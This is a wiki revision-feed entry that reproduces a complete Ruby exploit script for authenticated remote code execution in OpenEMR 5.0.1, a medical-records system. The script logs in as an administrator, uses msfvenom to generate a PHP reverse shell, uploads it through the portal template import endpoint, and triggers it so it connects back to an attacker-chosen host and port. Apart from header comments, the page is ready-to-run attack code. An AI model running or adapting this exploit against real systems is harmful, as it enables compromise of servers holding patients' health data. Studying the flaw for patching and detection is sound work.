https://pwnwiki.com/index.php?action=history&feed=atom&title=OpenEMR_5.0.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E OpenEMR 5.0.1 遠程代碼執行漏洞 - Revision history 2026-04-16T10:23:07Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=OpenEMR_5.0.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1297&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) # Exploit Author: Alexandre ZANNI # Date: 2020-07-16 # Vendor Homepage: https://www.open-emr.o..." 2021-04-09T07:58:27Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) # Exploit Author: Alexandre ZANNI # Date: 2020-07-16 # Vendor Homepage: https://www.open-emr.o...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)<br /> # Exploit Author: Alexandre ZANNI<br /> # Date: 2020-07-16<br /> # Vendor Homepage: https://www.open-emr.org/<br /> # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz<br /> # Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile <br /> # Version: &lt; 5.0.1 (Patch 4)<br /> # Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3<br /> # References: https://www.exploit-db.com/exploits/48515<br /> <br /> #!/usr/bin/env ruby<br /> <br /> require 'httpclient'<br /> require 'docopt'<br /> <br /> shell_name = 'shell4.php'<br /> user = 'openemr_admin'<br /> password = 'xxxxxx'<br /> payload = 'php/reverse_php'<br /> lhost = '10.10.15.201'<br /> lport = 8888<br /> <br /> doc = &lt;&lt;~DOCOPT<br /> OpenEMR &lt;= 5.0.1 - (Authenticated) Remote Code Execution<br /> <br /> Usage:<br /> #{__FILE__} manual --root-url &lt;url&gt; --shell &lt;filename&gt; --user &lt;username&gt; --password &lt;password&gt; [--debug]<br /> #{__FILE__} semi-auto --root-url &lt;url&gt; --user &lt;username&gt; --password &lt;password&gt; --payload &lt;payload&gt; --lhost &lt;host&gt; --lport &lt;port&gt; [--debug]<br /> #{__FILE__} auto --root-url &lt;url&gt; --user &lt;username&gt; --password &lt;password&gt; --lhost &lt;host&gt; --lport &lt;port&gt; [--debug]<br /> #{__FILE__} -H | --help<br /> <br /> Options:<br /> -r &lt;url&gt;, --root-url &lt;url&gt; Root URL (base path) including HTTP scheme, port and root folder<br /> -s &lt;filename&gt;, --shell &lt;filename&gt; Filename of the PHP reverse shell payload<br /> -u &lt;username&gt;, --user &lt;username&gt; Username of the admin<br /> -p &lt;password&gt;, --password &lt;password&gt; Password of the admin<br /> -m &lt;payload&gt;, --payload &lt;payload&gt; Metasploit PHP payload<br /> -h &lt;host&gt;, --lhost &lt;host&gt; Reverse shell local host<br /> -t &lt;port&gt;, --lport &lt;port&gt; Reverse shell local port<br /> --debug Display arguments<br /> -H, --help Show this screen<br /> <br /> Examples:<br /> #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123<br /> #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888<br /> #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999<br /> DOCOPT<br /> <br /> begin<br /> args = Docopt.docopt(doc)<br /> pp args if args['--debug']<br /> if args['manual']<br /> shell_name = File.basename(args['--shell'])<br /> shell_path = args['--shell']<br /> else<br /> shell_name = &quot;tmp#{rand(1000)}.php&quot;<br /> shell_path = shell_name<br /> end<br /> if args['semi-auto']<br /> payload = args['--payload']<br /> else<br /> payload = 'php/reverse_php'<br /> end<br /> # Authentication data<br /> uri_1 = URI(&quot;#{args['--root-url']}/interface/main/main_screen.php?auth=login&amp;site=default&quot;)<br /> data_1= {<br /> 'new_login_session_management' =&gt; '1',<br /> 'authProvider' =&gt; 'Default',<br /> 'authUser' =&gt; args['--user'],<br /> 'clearPass' =&gt; args['--password'],<br /> 'languageChoice' =&gt; '1'<br /> }<br /> # Reverse shell data<br /> unless args['manual']<br /> puts &quot;[+] Generating the reverse shell payload: #{shell_name}&quot;<br /> %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw &gt; #{shell_name})<br /> end<br /> data_2 = {<br /> 'site' =&gt; 'default',<br /> 'mode' =&gt; 'save',<br /> 'docid' =&gt; shell_name,<br /> 'content' =&gt; File.read(shell_path)}<br /> uri_2 = URI(&quot;#{args['--root-url']}/portal/import_template.php?site=default&quot;)<br /> uri_3 = URI(&quot;#{args['--root-url']}/portal/#{shell_name}&quot;)<br /> <br /> clnt = HTTPClient.new<br /> <br /> puts '[+] Authenticating'<br /> clnt.post(uri_1, data_1)<br /> <br /> puts '[+] Uploading the reverse shell'<br /> clnt.post(uri_2, data_2)<br /> <br /> puts &quot;[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}&quot;<br /> clnt.get(uri_3)<br /> rescue Docopt::Exit =&gt; e<br /> puts e.message<br /> end<br /> &lt;/pre&gt;</div> Pwnwiki